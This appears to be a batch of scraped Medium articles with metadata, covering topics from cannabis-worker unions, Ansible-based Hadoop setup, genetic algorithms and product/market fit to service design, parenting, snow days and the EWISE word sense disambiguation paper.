['Silkie Carlo']
|
2020-12-22 14:35:37.003000+00:00
|
['Democracy', 'Lockdown', 'Christmas', 'Boris Johnson']
|
Emily Hicks
|
Emily Hicks
President and Co-Founder, FREDsense
Emily Hicks is President of FREDsense, a Calgary, Canada based biotechnology startup focused on the measurement of water quality. Emily co-founded the company with CEO David Lloyd in 2013. FRED stands for Field Ready Electrochemical Detector, which is the product that Emily — along with her FREDsense colleagues — invented, developed and brought to market. It’s used to detect trace amounts of chemicals in a water using a groundbreaking new approach using biologically engineered bacteria.
Her studies in biomedical sciences at the U of C eventually led her to work on the technology on which FREDsense is based. She is a named inventor in the 2013 patent related to that work.
Amongst her wide variety of accolades, Emily has been selected as a Kairos Society Fellow, one of the Top 30 under 30 in sustainability in Canada, a National Nicol Award winner in 2014, the Parlee McLaws Females in Energy Scholorship, amongst many other awards.
Emily Hicks is a passionate scientist and entrepreneur. In our wide ranging interview, she not only eloquently explains the FREDsense technology in terms we can all understand but also the pleasures and pitfalls of the entrepreneurial life. It’s a candid discussion for which the answer to at least some of the questions will come as a surprise to our listeners.
Our interview with Emily was recorded live at the INVENTURE$ conference in Calgary, in June of 2018.
|
https://medium.com/the-worknotwork-show/emily-hicks-5c3196bd14d2
|
['Terence C. Gannon']
|
2019-03-23 01:44:19.121000+00:00
|
['Biotechnology', 'Startup', 'Podcast', 'Interview', 'Water']
|
The Labor Day After
|
The Labor Day After
by Carl Fillichio, Vice President at Weedmaps
Tuesday morning quarterbacking Labor Day 2021 media coverage:
The New York Times ran a lengthy and riveting opinion piece (“Let’s Honor True Spirit of Labor Day With a Union Revival”) exploring how American history often ignored the labor movement’s bloody struggle for human dignity. . . . while the New York Post’s editorial board explained “why most Americans no longer honor unions on Labor Day.” CNET revealed “the curious truth about Labor Day’s origins” . . . while National Public Radio just explained “why we celebrate it.” USA Today posted the stores and restaurants that were open yesterday. And on Fox News, Callista and Newt Gingrich shared what COVID taught us about American workers. All-in-all, a pretty normal Labor Day as far as news goes.
Scratch that. “There’s nothing normal about Labor Day 2021,” warned US News & World Reports.
Oddly absent from the Labor Day news coverage and editorializing was cannabis — and how the nascent legal cannabis industry has become a showcase of organized labor’s impact, evolution and success. Despite its impressive economic value — the legal market is projected to pull in $43 billion by 2025 — cannabis’ exclusion from the Labor Day Hit Parade wasn’t surprising. We saw it first a few months ago, when countless pundits declared the American trade movement dead after Amazon workers in Alabama voted overwhelmingly against forming a union. A blow for unions, certainly, but not enough of a reason to write their obituary. Especially as dozens of wins across the country were gained in the cannabis industry.
At the time of the Amazon election results, POLITICO noted that the cannabis industry is fertile ground for organizing efforts and highlighted workers at cannabis companies in New York and Massachusetts who recently voted to join the United Food and Commercial Workers Union. Forty Sunnyside workers in four different New York dispensaries (Sunnyside is owned by Cresco Labs) and 11 Curaleaf workers in Massachusetts voted for union representation. The designation by Governors from both political parties of cannabis shops in legal states as “essential” businesses during the COVID pandemic pushed workers to unions, as they were concerned for their safety at work. The union representing dispensary workers in Los Angeles for example, made sure dispensaries required masks and restricted in-store interaction.
The timing is certainly ripe for unionization within the industry, as states roll out or expand medical and adult-use programs. Additionally, public support for both unions and cannabis legalization are at record levels. About 10,000 cannabis workers — mostly in retail dispensaries — are represented by the UFCW. Other unions are in it to win it, too, including the Teamsters, representing cannabis workers in agriculture, cultivation and retail. The United Domestic Workers don’t represent cannabis workers per se, but rather home care aides whose patients rely on safe access to cannabis medication.
According to Marijuana Business Daily, union organizing in the cannabis industry has picked up significantly in the past year, in response to issues brought on by the coronavirus pandemic. Traditional “union states’’ like Illinois, Massachusetts and New Jersey have particularly active campaigns. Cannabis workers join a union for a variety of reasons: health and safety issues, a voice in the workplace, and wage/benefit concerns brought on by an “unbanked” industry. Labor peace agreements and sophisticated organizing efforts are also resulting in unionized cannabis workplaces.
It should come as no surprise that all of this is impacting who is part of the cannabis industry, and who has a say in the industry’s future. The labor movement is taking its seat at the table. In New Jersey for example, Gov. Phil Murphy appointed a UFCW official to the state’s new Cannabis Regulatory Commission, flagging the union’s role in the state’s soon-to-launch adult-use cannabis program.
Unionization is also providing the cannabis industry with a credibility boost and image enhancement. “There’s a lot of people who look down on it because there’s a lot of stigma to it and I think that unionizing cannabis workers will remove a lot of that stigma,” a dispensary worker told VICE earlier this year. Proud to call himself a union guy, he believes the union “solidifies us as a respectable part of the United States’ workforce and a respectable part of the United States economy.”
And ultimately, unions could be the secret ingredient that gets cannabis legalized at the federal level. The most pro-union president in American history isn’t enamored with the idea of legal cannabis. But he might be more open to it if the prodding came from his union friends.
|
https://medium.com/@weedmaps/the-labor-day-after-8f6098e2d102
|
[]
|
2021-09-07 20:54:32.610000+00:00
|
['Unions', 'Labor', 'Marijuana', 'Cannabis', 'Labor Day']
|
Automating Hadoop Cluster Setup Using Ansible
|
What is Ansible?
Ansible is an open-source automation tool, or platform, used for IT tasks such as configuration management, application deployment, intraservice orchestration, and provisioning. Automation is crucial these days, with IT environments that are too complex and often need to scale too quickly for system administrators and developers to keep up if they had to do everything manually. Automation simplifies complex tasks, not just making developers’ jobs more manageable but allowing them to focus attention on other tasks that add value to an organization.
What is Hadoop ?
The Hadoop Distributed File System (HDFS) is a distributed file system designed to run on commodity hardware. It has many similarities with existing distributed file systems. However, the differences from other distributed file systems are significant. HDFS is highly fault-tolerant and is designed to be deployed on low-cost hardware.
Ansible Architecture :
Ansible Playbooks :
Ordered lists of tasks, saved so you can run those tasks in that order repeatedly. Playbooks are written in YAML format.
Inventory :
A list of managed nodes. An inventory file is also sometimes called a hostfile. Your inventory can specify information like IP address for each managed node.
Control Node:
Any machine with Ansible installed is known as controller node. You can run Ansible commands and playbooks by invoking the ansible or ansible-playbook command from any control node.
Managed Node:
The devices you manage with Ansible. Managed nodes are also sometimes called hosts.
Now lets start setup of Hadoop Cluster using Ansible.
Steps :
Install ansible in controller mode
pip3 install ansible
yum install sshpass#To see version of ansible installed
ansible --version
Ansible Configuration File
vim /etc/ansible/ansible.conf
To check connectivity with all Managed Nodes
ansible all -m ping
PlayBook :
PlayBook for Configration of NameNode
Running NameNode Playbook
ansible-playbook namenode.yml
Checking namenode services has been started in target node
PlayBook for Configration of DataNode
Running DataNode Playbook
(Due to low RAM and CPU resources I am making DataNode same VM that I used for NameNode. For that just stop the NameNode Services and delete the NameNode folder.)
ansible-playbook datanode.yml
PlayBook for Configration of Client
Link to Code :
|
https://medium.com/@sarthak3398/automating-hadoop-cluster-setup-using-ansible-687b2f58d7d6
|
['Sarthak Srivastava']
|
2020-12-06 12:27:40.771000+00:00
|
['Ansible', 'Hadoop', 'Automation', 'DevOps', 'Ansible Playbook']
|
Introduction to Genetic Algorithms — Including Example Code
|
A genetic algorithm is a search heuristic that is inspired by Charles Darwin’s theory of natural evolution. This algorithm reflects the process of natural selection where the fittest individuals are selected for reproduction in order to produce offspring of the next generation.
Notion of Natural Selection
The process of natural selection starts with the selection of fittest individuals from a population. They produce offspring which inherit the characteristics of the parents and will be added to the next generation. If parents have better fitness, their offspring will be better than parents and have a better chance at surviving. This process keeps on iterating and at the end, a generation with the fittest individuals will be found.
This notion can be applied for a search problem. We consider a set of solutions for a problem and select the set of best ones out of them.
Five phases are considered in a genetic algorithm.
Initial population Fitness function Selection Crossover Mutation
Initial Population
The process begins with a set of individuals which is called a Population. Each individual is a solution to the problem you want to solve.
An individual is characterized by a set of parameters (variables) known as Genes. Genes are joined into a string to form a Chromosome (solution).
In a genetic algorithm, the set of genes of an individual is represented using a string, in terms of an alphabet. Usually, binary values are used (string of 1s and 0s). We say that we encode the genes in a chromosome.
Population, Chromosomes and Genes
Fitness Function
The fitness function determines how fit an individual is (the ability of an individual to compete with other individuals). It gives a fitness score to each individual. The probability that an individual will be selected for reproduction is based on its fitness score.
Selection
The idea of selection phase is to select the fittest individuals and let them pass their genes to the next generation.
Two pairs of individuals (parents) are selected based on their fitness scores. Individuals with high fitness have more chance to be selected for reproduction.
Crossover
Crossover is the most significant phase in a genetic algorithm. For each pair of parents to be mated, a crossover point is chosen at random from within the genes.
For example, consider the crossover point to be 3 as shown below.
Crossover point
Offspring are created by exchanging the genes of parents among themselves until the crossover point is reached.
Exchanging genes among parents
The new offspring are added to the population.
New offspring
Mutation
In certain new offspring formed, some of their genes can be subjected to a mutation with a low random probability. This implies that some of the bits in the bit string can be flipped.
Mutation: Before and After
Mutation occurs to maintain diversity within the population and prevent premature convergence.
Termination
The algorithm terminates if the population has converged (does not produce offspring which are significantly different from the previous generation). Then it is said that the genetic algorithm has provided a set of solutions to our problem.
Comments
The population has a fixed size. As new generations are formed, individuals with least fitness die, providing space for new offspring.
The sequence of phases is repeated to produce individuals in each new generation which are better than the previous generation.
Pseudocode
START
Generate the initial population
Compute fitness
REPEAT
Selection
Crossover
Mutation
Compute fitness
UNTIL population has converged
STOP
Example Implementation in Java
Given below is an example implementation of a genetic algorithm in Java. Feel free to play around with the code.
Given a set of 5 genes, each gene can hold one of the binary values 0 and 1.
The fitness value is calculated as the number of 1s present in the genome. If there are five 1s, then it is having maximum fitness. If there are no 1s, then it has the minimum fitness.
This genetic algorithm tries to maximize the fitness function to provide a population consisting of the fittest individual, i.e. individuals with five 1s.
Note: In this example, after crossover and mutation, the least fit individual is replaced from the new fittest offspring.
|
https://towardsdatascience.com/introduction-to-genetic-algorithms-including-example-code-e396e98d8bf3
|
['Vijini Mallawaarachchi']
|
2020-03-01 06:15:40.326000+00:00
|
['Machine Learning', 'Evolutionary Algorithms', 'Computer Science', 'Data Science', 'Genetic Algorithm']
|
Good Services: a bloody good read (Part 3)
|
Good Services by Lou Downe tells you how to design good services that work.
I’m sharing my book notes so that you can enjoy the highlights for now, and hopefully be inspired to go on and buy it.
I’m not on commission. I just think that if you work in a job where you’re responsible for the delivery of services to other humans — you should read this book. It will help you to make your services better.
I am not alone!
The book contains 15 principles, which if followed, will help you to design services that work. Many of the examples in the book are from Lou’s experience of working in UK government organisations.
My notes are personal to me. I’ve noted the things that resonate, or that I want to remember and in places, added my own examples. I recommend you read the book to understand things in more depth and to read Lou’s stories of good and bad service design.
I’ve separated my notes into a three parts.
Part one: pre-service stuff
Part two: during service delivery
Part three: post-service stuff (this one)
15 Principles of Good Service Design
(Principles 1–12 are in parts one and two)
13 — A good service should respond to change quickly
Respond quickly and adaptively to a change in a user’s circumstance and make this change consistently throughout the service.
The most common problem with these less predictable changes is that we don’t expect them to happen at all.
Thriva offers no way for users to change their gender
Thriva tests customers’ general health and well-being in the comfort of their home. By asking customers’ biological sex, they presumed their customers’ gender. They don’t offer any way for users to change their gender. This became a problem in 2018 when they sent marketing materials for fertility tests and hormone balances to trans men and women who had identified as female.
Think carefully about what pieces of information you use to anchor the identity of your user. Name, gender, age, location, address and phone number can all change.
What can we do differently?
Work on the assumption that nothing is fixed — make it easy for users to change things about themselves.
Make a list of all the changes that might happen to a user and work out which ones need to be designed for as functionality.
Give users the option of changing their details at the point when it becomes relevant to them (e.g., the NHS in the UK asks patients to confirm their phone number and address details when they make an appointment).
Always give users the ability to share only what they want to share.
14 — A good service clearly explains why a decision has been made
When a decision is made within a service, it should be obvious to a user why this decision has been made and clearly communicated at the point at which it’s made. A user should also be given a route to contest this if they need to.
In an effort to standardise decisions across multiple services, we create policies, processes and scripts to ensure our decisions about users are consistent regardless of who makes them (often codified as algorithms). Yet, what if these algorithms are biased? It’s only over time that we start to notice a pattern.
If decision making isn’t transparent, it means that bad decisions can continue unchecked and unchanged. The harm doesn’t come when an algorithm is given too much power, but when it isn’t explained. Decisions based on policy are often equally as unexplained.
Favourite quotes
We design our services in a way that demands 100% accuracy, and that just isn’t realistic. People and machines make mistakes. With lack of transparency in explaining decision making, it’s impossible for staff to change that decision, and users are left with no understanding of how they might take control of the situation and appeal.
What can we do differently?
Make sure decisions are:
Valid — eliminating bias, conflicts or dead ends
Transparent — to both users and staff
Communicated — at the time it’s made
Capable of appeal — because you won’t always get it right
15 — A good service makes it easy to get human assistance
What differentiates your service is not whether or not it fails, but how it deals with failure when it inevitably happens. Getting access to a real human being who is empowered to make a decision and clearly explain it to you, is a vital part of that recovery.
Research conducted by Government Digital Service in 2014 established that 80% of the cost of government was spent on services. And 60% of that cost was spent on calls and casework. Diving even deeper, those calls and case work were split as follows:
Status checking 43%
How to do something 52%
Complaints 5%
Complex cases 2%
The vast majority of these could be solved with clearer service design. Often, our solution to this is to make it harder to seek human assistance. Have you ever tried to find a phone number for Ebay, Amazon or a high street retailer? But, hiding your phone number just pisses people off.
The balance between human and machine-based interaction will vary depending on the service and factors including complexity, risk profile, value and whether it’s tied to the physical world, e.g., hotel, GP surgery.
If we’re leaving the machines to deal with the simple cases and the humans are reserved for the more complex cases, they will have to be more expert and empowered to make decisions than ever before.
What can we do differently?
Make sure humans are accessible when needed
Use humans / machines proportionately
Empower the humans to make decisions — this means removing org. Boundaries and ensuring that they are experts and multi-skilled.
Consistent with the rest of the service — human decisions must be consistent with other human decisions and those made in other channels.
I hope that you’ve enjoyed my summary of Lou’s book and that I’ve inspired you to go on and take a deeper dive into the book for real.
|
https://medium.com/service-works/good-services-a-bloody-good-read-part-3-1063a8ba218
|
['Jo Carter']
|
2020-04-22 09:23:10.017000+00:00
|
['Human Centered Design', 'Government', 'Design Thinking', 'Service Design']
|
The Request
|
Written by
Almost famous cartoonist who laughs at her own jokes and hopes you will, too.
|
https://marcialiss17.medium.com/the-request-e04360b12bd5
|
[]
|
2020-02-14 14:31:53.329000+00:00
|
['Humor', 'Family', 'Funny', 'Comics', 'Cartoon']
|
Product/Market Fit: What it really means, How to Measure it, and Where to find it
|
Product/Market Fit is a common concept in the startup world. While widely applied in conversations around new high-growth companies, it doesn’t seem to have caught on in the rest of the business world yet.
It deserves to be more widely understood, because it’s a useful Mental Model for the interplay between a business, it’s products, and it’s customers. Learning about Product/Market Fit will help you see the world differently, and inspire new ways to create value for your customers, and growth for your business.
What is Product-Market Fit?
Because it’s such a new concept, there are a few overlapping definitions of Product-Market Fit. We should start with the definition from Marc Andreesen, who originally coined ‘Product/Market Fit’ in his post “The Only Thing That Matters”:
Product/market fit means being in a good market with a product that can satisfy that market.
This is a rather vague definition, but it’s a start. What Andreesen says gives us a more vivid illustration of what Product/market fit really feels like:
You can always feel when product/market fit isn’t happening. The customers aren’t quite getting value out of the product, word of mouth isn’t spreading, usage isn’t growing that fast, press reviews are kind of “blah”, the sales cycle takes too long, and lots of deals never close. And you can always feel product/market fit when it’s happening. The customers are buying the product just as fast as you can make it — or usage is growing just as fast as you can add more servers. Money from customers is piling up in your company checking account. You’re hiring sales and customer support staff as fast as you can. Reporters are calling because they’ve heard about your hot new thing and they want to talk to you about it.
Marc Andreesen’s post on Product Market Fit is the most-recommended resource ever received on Evergreen. It was sent in separately by 6 people, including 2 Gregs: Greg Meyer, Greg Drach, Nitya Nambisan, Aaron Wolfson, and Jason Evanish.
When your customers spread your product
A complementary definition was found in Principles of Product Design, by Josh Porter, suggested by Tim Harsch. Josh’s idea of the level of dedication and excitement by customers is an indicator of Product/market fit:
Product/market fit is when people sell for you
Product market fit is a funny term, but here’s a concrete way to think about it. When people understand and use your product enough to recognize it’s value that’s a huge win. But when they begin to share their positive experience with others, when you can replicate the experience with every new user who your existing users tell, then you have product market fit on your hands. And when this occurs something magical happens. All of a sudden your customers become your salespeople.
Validation of the Value Hypothesis
The definition that feels the most precise and helpful I found in this post by Andy Rachleff, the CEO of Wealthfront, called Why you Should Find Product-Market Fit Before Sniffing Around for Venture Money. He paraphrases work by Eric Reis and Steve Blank to create this explanation:
A value hypothesis is an attempt to articulate the key assumption that underlies why a customer is likely to use your product. A growth hypothesis represents your best thinking about how you can scale the number of customers attracted to your product or service. Identifying a compelling value hypothesis is what I call finding product/market fit. A value hypothesis addresses both the features and business model required to entice a customer to buy your product.
Worth noting on this definition is that there are likely multiple key assumptions to be validated, across product, pricing, and business models. Thanks to Joe Bayley for recommending this post by Andy Rachleff.
Myths about Product Market Fit
This post by Ben Horowitz called The Revenge of the Fat Guy (in reference to a debate with Fred Wilson), has insight that radically improves understanding of Product/market fit. In it, he outlines 4 common myths:
Myth #1: Product market fit is always a discrete, big bang event
Product market fit is always a discrete, big bang event Myth #2: It’s patently obvious when you have product market fit
It’s patently obvious when you have product market fit Myth #3: Once you achieve product market fit, you can’t lose it
Once you achieve product market fit, you can’t lose it Myth #4: Once you have product-market fit, you don’t have to sweat the competition
If the definitions above left room for these myths to take hold — read this post and dispel them, before they cause you and your business harm.
Finding Resonance
Itamar Goldminz, a reader and common contributor to Evergreen wrote this piece that uses the metaphor of resonance from Physics to describe Product-market fit:
A good analogy for finding PMF comes from Physics: finding resonance with your customers and getting on the same wavelength as them. Note that this can be accomplished both by changing your product and by changing your customers (market pivot). Changing your wavelength is a gradual, continuous process (anti-myth #1), you know when you’re close to being on the same wavelength but it’s hard to tell if you’re exactly there (anti-myth #2). Since both your product and your customers constantly change (wavelength), it’s easy to get out of sync again (anti-myth #3) and it’s clear that your actions don’t prevent others from getting on the same wavelength (anti-myth #4).
How to get Product-Market Fit
Knowing that we need to get to Product-Market Fit, and what it means to do so, the obvious question is ‘How?’. There is a unique path for every company (or there is failure), and these ways to look at the problem will help you find your way.
Everything is on the Table
Here is another idea from the godfather of Product/market fit, Marc Andreesen. It explains that everything is a possible lever to move your toward product/market fit, and might be changed in that pursuit.
Do whatever is required to get to product/market fit. Including changing out people, rewriting your product, moving into a different market, telling customers no when you don’t want to, telling customers yes when you don’t want to, raising that fourth round of highly dilutive venture capital — whatever is required. When you get right down to it, you can ignore almost everything else.
Changing teams, markets, products, names, and visions are all reasonable in pursuit of product-market fit. That’s the story of many companies: Instagram, Soylent, Anyperk, Twitter — all radically changed course from their original plan to find Product-market fit.
Talk to your customers
Customer Development is a core skill to developing product-market fit. We’ve created a whole Edition of Evergreen on it, called How to Failure-proof your business with Customer Development.
Product-Market Fit is Everyone’s Job
Every employee in the company should understand that they’re hunting for Product-Market Fit, and expect that it’s going to be a tough journey. It’s not a matter of linear progress — it’s a maze where you spend most of your time lost, never sure if you’re making progress or just eliminating an idea through invalidation. Ryan Holiday has a great comment on this:
Product Market Fit is not some mythical status that happens accidentally. Companies work for it; they crawl toward it. They’re ready to throw out weeks or months of work because the evidence supports that decision. The services as their customers know them now are fundamentally different from what they were at launch — before they had Product Market Fit.
Every member of the team has a role to play in finding it, from those who are building products to those that make strategic decisions or interact with customers.
Today, it is the marketer’s job as much as anyone else’s to make sure Product Market Fit happens. […] But rather than waiting for it to happen magically or assuming that this is some other department’s job, marketers need to contribute to this process. Isolating who your customers are, figuring out their needs, designing a product that will blow their minds — these are marketing decisions, not just development and design choices.
These excellent excerpts come from Ryan Holiday’s course on Growth Hacker Marketing, suggested by Vinish Garg.
All Markets are Not Created Equal
Andrew Chen has an underrated post about how to know when a consumer startup has hit Product/market fit. In it, he outlines what makes a ‘good market’:
- A large number of potential users - High growth in # of potential users - Ease of user acquisition
and what the benefits are of targeting a good market:
Leading with a great market helps you execute your product design in a simpler and cleaner way. The reason is that once you’ve picked a big market, you can take the time to figure out some user-centric attributes upon which to compete. The important part here is that you can usually pick some key things in which your product is different, but then default the rest of the product decisions.
Product-market fit means that you’ve found a product and a market that wants it — but if that market is small, cheap, or shrinking… you still won’t have much of a company. Don’t just find a market — find a great market.
How to Measure Product/Market Fit
As management legend Peter Drucker always says: “What gets measured gets managed” — so how to we measure this concept of Product/Market fit? How do we know if we’re getting closer, or if we have it?
This isn’t an easy question, and there’s no perfect answers, but there are three approximations that can guide your journey to Product/market fit.
Do your Customers Recommend you to Friends?
Net Promoter Score (NPS) is a simple survey, asking customers to rate from 1–10, “How likely are you to recommend _____ to a friend or colleague?” Here’s a basic explanation of the Net Promoter score Metric, and how it is calculated.
A screenshot from Delighted’s Demo.
Services like Delighted automate the process of collecting and analyzing the data for you. I talked with my friend Caleb Elston, and set you up with a $100 credit to get you started. If you plan to try it, email [email protected] with the subject line “Evergreen sent me” and they’ll take great care of you.
Do customers care if your company died tomorrow?
A complementary question to NPS, which is measuring how many customers love you, is this approach which measures how many customers would be distraught if they couldn’t have your product/service anymore.
This is an effective way to measure your value to them, and approximate the price you could extract or the leverage you have to push growth by asking your users to share or invite their friends.
How would you feel if you could no longer use [product]? - Very disappointed - Somewhat disappointed - Not disappointed (it isn’t really that useful) - N/A — I no longer use [product] If you find that over 40% of your users are saying that they would be “very disappointed” without your product, there is a great chance you can build sustainable, scalable customer acquisition growth on this “must have” product.
This post from Growth Hacker Sean Ellis was suggested by Tyler Hayes, and introduces a tool to send out this question called survey.io.
How Many Customers Leave & How Soon?
Alex Shultz, in his talk in the Lecture series How to Start a Startup at Stanford calls out his definition of Product-Market fit, which is based on churn and user retention:
Look at this curve, ‘percent monthly active’ versus ‘number of days from acquisition’, if you end up with a retention curve that is asymptotic to a line parallel to the X-axis, you have a viable business and you have product market fit for some subset of market.
This may require some context (and some research and math to figure out for your business), so check out this full talk to get the whole story:
This talk was also suggested by Tyler Hayes, who dominates resources for learning how to measure Product/market Fit. You rock, Tyler.
Extra Bonus Presentations
These two presentations, one from Andrew Chen and one from Jason Evanish, get into the process of arriving at Product-Market fit, and are worth clicking through to learn more.
Andrew Chen: Zero to Product/Market Fit Presentation
Jason Evanish: Getting to Product/Market Fit
|
https://medium.com/evergreen-business-weekly/product-market-fit-what-it-really-means-how-to-measure-it-and-where-to-find-it-70e746be907b
|
['Eric Jorgenson']
|
2020-05-06 23:42:25.664000+00:00
|
['Startup', 'Silicon Valley', 'Product Market Fit', 'Entrepreneurship', 'Business Building']
|
What is Landing Page and How to Optimize It
|
Landing pages are a very important part of any website, especially e-commerce. By optimizing this landing page, you can increase your traffic and conversion rates. Obviously, you’ll need to tailor this page to your target audience, but there are some basic marketing guidelines that apply to landing pages with a various niches. This article will discuss a complete landing page guide, especially for those of you who have e-commerce websites.
First of all, what is a landing page?
Landing pages in the SEO dictionary are pages where visitors “land” or come from other sources, such as search engines or social media. Basically this page needs to be optimized to generate certain reactions and interactions with visitors, such as buying a product, subscribing to a newsletter, or perhaps clicking through to another page on your site.
Of course, there are various ways to get your landing page to get more traffic and have high marketing value. In this article, however, we will focus primarily on how to increase the conversion rate which will affect the number of enthusiasts for your product.
Determine the focus of the landing page
Focus is very important on your landing page because this is where you maximize marketing points such as selling products, offering services, or building a brand image.
Make sure you only have one focal point. If people come to your landing page because they’re looking for the sneakers you offer on your e-commerce site, then optimize this page in a way that guides potential customers to the checkout page.
To determine the focus of a landing page, it’s relatively easy. Find out what people are looking for from the most keywords in demand. For e-commerce sites, the landing page for that product should focus on the ‘Add to Cart’ button, this trick is also known as a call-to-action. Think carefully about the placement, color, and text used as call-to-action buttons.
Read more about How to Optimize Landing Page for E-commerce in cmlabs blog. Don’t forget to subscribe to get notification for new articles!
|
https://medium.com/@annissa.manystighosa/what-is-landing-page-and-how-to-optimize-it-e7d36af90af4
|
['Annissa Manystighosa']
|
2020-10-07 02:40:32.326000+00:00
|
['Website Development', 'Landing Page', 'Ecommerce']
|
Parent
|
Wednesday: Describe a decision you’re facing right now. Which path will lead to most growth?
I don’t really know. This question makes me panic, dreading that I may be lost. What if there is no growth on my path- because I feel stagnant now? No growth-leading-path hanging on new decisions at the moment.
I do vow to follow through with the most recent one that I believe will help me grow as a mother, a person, a being.
My little guy is the third boy I’m bringing up. This time my own flesh and blood, his cells unite often to push those hidden buttons, or worse, buttons I thought inexistent. After raising my voice and threatening punishment countless times, feeling rotten afterwards, I’ve decided to become a better parent. Fury escalates into violence, loss of control. I should know better where that leads to. I remember all too well.
The amount of books and audiobooks one can find at the public library is enormous. I’ve put my name on waiting lists for as many as possible, borrowed as many as I could, and I’m listening, reading and scribbling down things to do, or that I think would help, with every chance I’ve got.
I can now slowly think ahead. I am slowly changing my understanding of my son’s actions and reactions, and I am slowly changing my responses, physical, verbal and in my mind. It’s becoming easier with practice, and I allow a sigh of relief here and there each time there’s the realization of progress.
My son is starting to trust me not only because I am his parent, but because I am love and comfort. He sees me less as the big bad wolf howling demands and more as the womb he came from as life.
|
https://medium.com/know-thyself-heal-thyself/parent-f1f1b23e0929
|
['Georgia Lewitt']
|
2020-12-24 17:38:36.913000+00:00
|
['Parenthood', 'Writing', 'Nonfiction', 'Spirituality', 'Life Lessons']
|
Is There Anything Quite Like a Snow Day?
|
Photo by Jasper Garratt on Unsplash
As a kid growing up in New England snow days were akin to Christmas Eve. You went to bed with the anticipation that the next morning would bring something new, something exciting, something rare.
My childhood bedroom was at the front of the house with windows facing the street. On snowy nights I’d creep out of bed, sometimes at two or three in the morning, and press my face against the window to watch the snow fall. The glow of the streetlights would reflect off the white on the ground and turn the entire street into some sort of surreal yellowish snow globe. The silence would be all-enveloping, that special sort of silence that only exists when it snows.
I’d set my alarm early, like early-early. The morning radio programs usually started at five, and they’d begin first thing with the list of closures or delays. My radio alarm clock was the most adult thing I owned and on these mornings, with the promise of a snow day hanging heavy in the air, it was also the most important thing I owned.
I lived in a town called Plainville and so I had to sit for agonizing hours (that were more likely seconds or minutes) as the DJ read through the list alphabetically. “Avon Public Schools, 2 hour-delay. Berlin Public Schools, cancelled. Bloomfield Public Schools, 2-hour delay.”
I learned to pay attention to the towns that were immediately around us, geography nerd that I was. If Bristol and Farmington and New Britain were cancelled, then things were looking up for us in tiny little Plainville, sandwiched between them. (Our other neighbor Southington was, appropriately, south in both location and alphabet and by then I would have already learned my fate and switched off the radio.)
“Plainville Public Schools, cancelled.”
In my little kid brain that was like winning the lottery. A. Whole. Day. Off. Never matter that now, as a grownup, 24 hours passes in the blink of an eye. As a child a snow day meant unlimited possibilities.
We’d spend the day running in and out of the house, pulling on and ripping off snow clothes. We’d have snowball fights where inevitably someone got hit with the icy snowball and started crying. We’d dig intricate, hobbit-like snow forts of the kind they tell kids not to dig these days, with tunnels that felt as though they were 30 feet deep and could collapse on us at any moment. We’d climb over ever-growing snowbanks and wave at the plow drivers as they passed by. Maybe we’d even dare each other to play snow plow-dodge, swearing that we knew of a kid two towns over who died doing it last year.
My dad built a skating rink in our backyard each year, and on some snow days we’d play hockey with neighborhood kids or just skate and push each other into the snow sideboards he’d built up around the perimeter. I wasn’t very good at doing the classic slide-stop on my ice skates so I’d do a little figure-skate spin to slow myself down. It was very queer, though at the time I thought it was a cool and elegant way to stop.
Photo by Mihály Köles on Unsplash
At the end of what seemed like an eternity we’d come inside for dinner, both sweaty and cold at the same time. Sometimes we’d be let out later that night for one last go at the snow; running around the front yard after the sun had set but the world was still lit up in that same yellow glow, not quite daylight but definitely far from dark. Other times we’d watch a movie, drifting off to sleep on the couch, completely exhausted from the day. For my mom, who’d lost a day to herself with the school closure, these post-snow day crashes must have felt like gifts from heaven.
Unless the storm was truly big we’d inevitably be back in school the next day; this was New England, after all. Snow didn’t stop much. Still though, we had that holiday. That escape. That one unstructured day just to go out and be kids.
Even now, in adulthood, I get giddy looking out the window and seeing the big fat flakes drift lazily toward the ground. The promise of what’s to come. The knowledge that when I wake up in the morning the world will have changed.
Snow days are a bit different as an adult, but in a way they can still spark that childhood joy. You still have a bit of an excuse to take some time off, to have some fun. It might mean not changing out of your pajamas while you answer work emails from home and making yourself a cocktail at lunch, or it might mean cozying up in front of the fireplace with a book all morning long. Maybe you take the day and go skiing, or have a Netflix marathon, or just do absolutely nothing except watch the snow fall. It’s the possibility of what could be that makes a snow day so special.
Or maybe you have kids and you’re like my mom, cursing the weather and waiting until they pass out, exhausted from playing in the snow all day.
Either way, is there anything quite like a snow day?
|
https://medium.com/@matt-lardie/is-there-anything-quite-like-a-snow-day-694e6335a2b5
|
['Matt Lardie']
|
2020-12-17 04:31:33.596000+00:00
|
['Winter', 'Snow Day', 'Snow', 'Nostalgia', 'Childhood']
|
EWISE: A New Approach to Word Sense Disambiguation
|
Natural language processing is a difficult task and the pure nature of complexity of the english language adds to this. Therefore, in this field we solve many subtasks to get closer to an interpretation that is truly natural. One such subtask is word sense disambiguation or WSD for short. This article explores this problem and delineates a new approach to solving it based on the recent outstanding paper in ACL 2019 by Kumar, Jat et al: Zero-shot Word Sense Disambiguation using Sense Definition Embeddings.
What is word sense disambiguation?
Words have different meanings and different intentions based on the context they are used in, even if they are the same words. These “difficult” words are more generally referred to as homonyms. Take the following example:
He was not feeling well after the marathon. The farmer grabbed the pail from the well.
Both sentences use the word “well,” but they clearly have different senses in each setting.
Word sense disambiguation (WSD) denotes the task of associating a word to its proper definition based on context clues.
RELATED WORK — What approaches exist to solve this problem?
WSD is a well explored problem and many approaches exist to tackle it.
The first are supervised and semi-supervised approaches that treat the definitions as discrete labels. One such supervised approach is context2vec that also uses Bidirectional LSTMs to learn generic context embedding functions. This and other supervised models fail to do well for words that are not included in the training dataset, so unseen and uncommon words cannot be deciphered.
The other type of approach is unsupervised knowledge based. One such unsupervised approach is Enhanced Lesk WSD, which uses WordNet to determine the number of shared words between the context of a word and each definition via a word similarity function. However, maximum overlap heuristics don’t perform as well as supervised approaches.
RELATED WORK — What relevant related approaches can we leverage to improve upon these existing solutions?
WordNet is a large dictionary database for the english language that not only contains various definitions for words, POS tags, and synonyms, but also semantic relations between different words in a format that machines can easily leverage and use.
To overcome the issue of not being able to get embeddings of rare and unseen words, we need to find a way to predict embeddings of these rare words with those of common words. The paper Learning to Compute Word Embeddings on the Fly helps us do exactly this with an LSTM network and access to dictionary data.
Using the above approaches we can create definition embeddings, but in WSD we still need to effectively connect the input sentences to the embedding outputs. We can leverage the work in Using the Output Embedding to Improve Language Models and use the update rules of word2vec forms to tie weights from input and output models together effectively.
EWISE: Extended WSD Incorporating Sense Embeddings
EWISE is the most current approach to tackling WSD and overcomes all aforementioned shortcomings. This approach learns a continuous space of sense embeddings as a target rather than discrete and thus enables generalized zero-shot learning. In other words, EWISE is able to identify definition mappings for both seen and unseen words.
